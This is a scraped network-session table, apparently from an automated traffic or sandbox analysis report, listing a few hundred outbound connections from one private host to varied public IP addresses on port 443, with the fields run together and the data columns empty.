                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17032192.168.2.235661059.70.169.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17033192.168.2.233298657.205.181.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17034192.168.2.2342806125.116.252.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17035192.168.2.234345469.236.44.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17036192.168.2.2356492131.194.216.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17037192.168.2.2345840175.230.11.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17038192.168.2.2346768116.82.77.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17039192.168.2.235817052.255.51.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17040192.168.2.2360370107.19.0.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17041192.168.2.2345764116.248.107.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17042192.168.2.2359378164.4.188.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17043192.168.2.2348304196.181.196.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17044192.168.2.234335431.188.148.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17045192.168.2.233793027.131.142.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17046192.168.2.234291086.75.163.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17047192.168.2.2350012136.225.103.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17048192.168.2.235398690.22.38.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17049192.168.2.2348534179.84.63.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17050192.168.2.2349174204.56.233.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17051192.168.2.235813813.65.8.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17052192.168.2.2348774165.75.149.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17053192.168.2.234985269.17.49.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17054192.168.2.2360860158.237.16.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17055192.168.2.234635227.29.216.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17056192.168.2.234722052.65.106.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17057192.168.2.2333940114.199.57.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17058192.168.2.233748872.245.31.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17059192.168.2.2348252177.8.92.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17060192.168.2.235142832.102.217.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17061192.168.2.2345290105.41.20.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17062192.168.2.2358830206.88.7.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17063192.168.2.234729827.185.158.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17064192.168.2.234160438.195.33.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17065192.168.2.2346432194.98.214.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17066192.168.2.234341489.185.35.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17067192.168.2.2338450131.145.237.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17068192.168.2.233409479.198.20.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17069192.168.2.235297484.84.60.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17070192.168.2.235115064.156.229.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17071192.168.2.235614257.209.154.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17072192.168.2.235801237.30.90.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17073192.168.2.2360666130.140.84.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17074192.168.2.2344466162.12.26.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17075192.168.2.2359634136.113.43.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17076192.168.2.2333294216.52.203.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17077192.168.2.2341914125.215.210.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17078192.168.2.233780879.223.238.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17079192.168.2.2350570178.6.185.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17080192.168.2.2338838222.253.163.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17081192.168.2.233523098.64.8.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17082192.168.2.2345710114.99.109.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17083192.168.2.2356442111.64.215.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17084192.168.2.2337220140.154.239.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17085192.168.2.235340073.123.251.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17086192.168.2.235638238.239.255.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17087192.168.2.2350826166.147.140.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17088192.168.2.2359544176.191.196.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17089192.168.2.234740083.245.154.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17090192.168.2.233395094.8.144.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17091192.168.2.2340482134.157.203.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17092192.168.2.2359412203.77.148.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17093192.168.2.2335338210.101.177.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17094192.168.2.233833842.139.252.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17095192.168.2.2338698102.121.108.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17096192.168.2.2340650216.29.253.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17097192.168.2.235274051.52.218.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17098192.168.2.233897675.71.182.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17099192.168.2.2347942130.20.161.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17100192.168.2.235672417.200.248.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17101192.168.2.2347536209.76.111.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17102192.168.2.2346636133.71.63.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17103192.168.2.2349362221.11.24.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17104192.168.2.235638478.218.177.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17105192.168.2.233433278.95.102.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17106192.168.2.2333804171.170.38.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17107192.168.2.2353522223.247.248.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17108192.168.2.236011289.173.200.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17109192.168.2.234808861.198.186.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17110192.168.2.234840697.76.25.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17111192.168.2.2353338143.153.67.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17112192.168.2.2347906199.123.83.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17113192.168.2.2355460176.57.129.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17114192.168.2.2354576186.110.176.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17115192.168.2.235363437.78.195.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17116192.168.2.23479385.202.159.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17117192.168.2.2358176170.184.175.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17118192.168.2.2350552104.231.155.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17119192.168.2.235074069.101.119.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17120192.168.2.2359740139.223.75.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17121192.168.2.2336442142.154.93.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17122192.168.2.2355460172.215.12.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17123192.168.2.236034088.114.137.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17124192.168.2.234653650.210.67.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17125192.168.2.234372037.104.140.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17126192.168.2.235113863.172.62.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17127192.168.2.235623035.61.79.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17128192.168.2.2336730194.91.65.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17129192.168.2.236069469.109.164.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17130192.168.2.235731867.80.156.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17131192.168.2.2352308187.102.95.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17132192.168.2.233780461.106.58.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17133192.168.2.234453097.25.199.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17134192.168.2.2345400176.198.164.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17135192.168.2.235957018.167.22.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17136192.168.2.2344818157.107.7.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17137192.168.2.2346124212.221.70.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17138192.168.2.234499017.131.42.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17139192.168.2.235611677.96.216.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17140192.168.2.2343040220.113.54.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17141192.168.2.2335278180.237.57.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17142192.168.2.2336410140.126.61.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17143192.168.2.2347662181.192.198.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17144192.168.2.233714250.33.188.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17145192.168.2.2342232114.120.40.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17146192.168.2.235767050.73.48.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17147192.168.2.2350408181.32.181.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17148192.168.2.2333606129.170.94.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17149192.168.2.2347198165.91.54.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17150192.168.2.234664653.78.64.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17151192.168.2.233423612.174.6.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17152192.168.2.2357860132.246.1.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17153192.168.2.2335412191.122.216.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17154192.168.2.235259825.157.31.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17155192.168.2.2346640105.186.223.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17156192.168.2.23470008.230.230.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17157192.168.2.233344685.193.91.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17158192.168.2.234290078.107.81.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17159192.168.2.235440446.16.46.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17160192.168.2.2341302125.130.114.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17161192.168.2.234655092.60.197.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17162192.168.2.2343508100.242.225.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17163192.168.2.234490031.156.7.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17164192.168.2.2340478188.95.24.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17165192.168.2.233524072.212.91.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17166192.168.2.235363237.164.43.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17167192.168.2.2347464191.247.5.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17168192.168.2.2341184195.99.12.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17169192.168.2.233547850.107.102.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17170192.168.2.2342258122.252.173.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17171192.168.2.234687861.168.225.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17172192.168.2.234662079.57.35.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17173192.168.2.2351524148.198.52.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17174192.168.2.234348854.156.232.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17175192.168.2.2337606170.43.216.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17176192.168.2.235528650.195.222.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17177192.168.2.2337922188.226.18.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17178192.168.2.234570295.163.144.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17179192.168.2.2340430139.108.137.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17180192.168.2.2353954152.42.32.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17181192.168.2.23608021.220.91.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17182192.168.2.2345838146.231.230.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17183192.168.2.2350230113.190.12.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17184192.168.2.2357020128.74.212.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17185192.168.2.2340898161.57.219.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17186192.168.2.2345980187.253.225.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17187192.168.2.234805657.174.12.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17188192.168.2.2356864107.63.137.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17189192.168.2.235174836.213.147.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17190192.168.2.235012243.11.60.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17191192.168.2.2352464140.198.111.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192192.168.2.2344560110.2.162.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17193192.168.2.233877427.97.84.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17194192.168.2.2349284153.112.85.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17195192.168.2.2355646180.192.112.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17196192.168.2.233503437.73.88.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17197192.168.2.234782281.212.155.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17198192.168.2.234985220.151.235.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17199192.168.2.2353482192.170.205.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17200192.168.2.2354506145.139.21.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17201192.168.2.235106482.27.207.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17202192.168.2.2337706176.208.69.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17203192.168.2.234580248.199.166.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17204192.168.2.2341864212.155.38.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17205192.168.2.23416924.161.133.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17206192.168.2.234921431.188.114.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17207192.168.2.2342512201.65.195.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17208192.168.2.2360204146.131.173.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17209192.168.2.233713032.248.38.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17210192.168.2.234380677.16.238.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17211192.168.2.235820492.198.168.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17212192.168.2.233329438.64.58.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17213192.168.2.2341834108.195.99.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17214192.168.2.2358442219.96.255.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17215192.168.2.2340432157.81.43.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17216192.168.2.2353060110.159.202.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17217192.168.2.2357286216.8.159.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17218192.168.2.2342282144.101.54.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17219192.168.2.233854490.155.32.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17220192.168.2.2354134144.101.76.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17221192.168.2.2339626202.146.239.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17222192.168.2.2337436167.99.163.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17223192.168.2.2355040200.232.32.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17224192.168.2.235264091.18.250.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17225192.168.2.2335272114.170.196.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17226192.168.2.2351536205.126.199.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17227192.168.2.2343388113.208.162.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17228192.168.2.234013450.100.167.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17229192.168.2.233346812.93.59.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17230192.168.2.234846443.104.42.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17231192.168.2.235987896.100.213.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17232192.168.2.2349200105.86.84.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17233192.168.2.2339792112.209.99.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17234192.168.2.235521463.0.184.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17235192.168.2.2341286169.216.133.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17236192.168.2.2348396222.193.93.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17237192.168.2.235013249.54.204.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17238192.168.2.2349710220.20.175.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17239192.168.2.235999245.198.125.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17240192.168.2.235175268.96.29.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17241192.168.2.233530843.125.30.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17242192.168.2.2333066129.29.187.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17243192.168.2.234743086.103.94.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17244192.168.2.2352286181.159.55.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17245192.168.2.2334234173.116.201.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17246192.168.2.234223438.194.21.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17247192.168.2.236029442.69.235.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17248192.168.2.2349382154.167.219.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17249192.168.2.2341000115.160.110.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17250192.168.2.2355332148.51.163.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17251192.168.2.2355204176.207.178.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17252192.168.2.2342290200.82.255.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17253192.168.2.233859078.154.127.168443
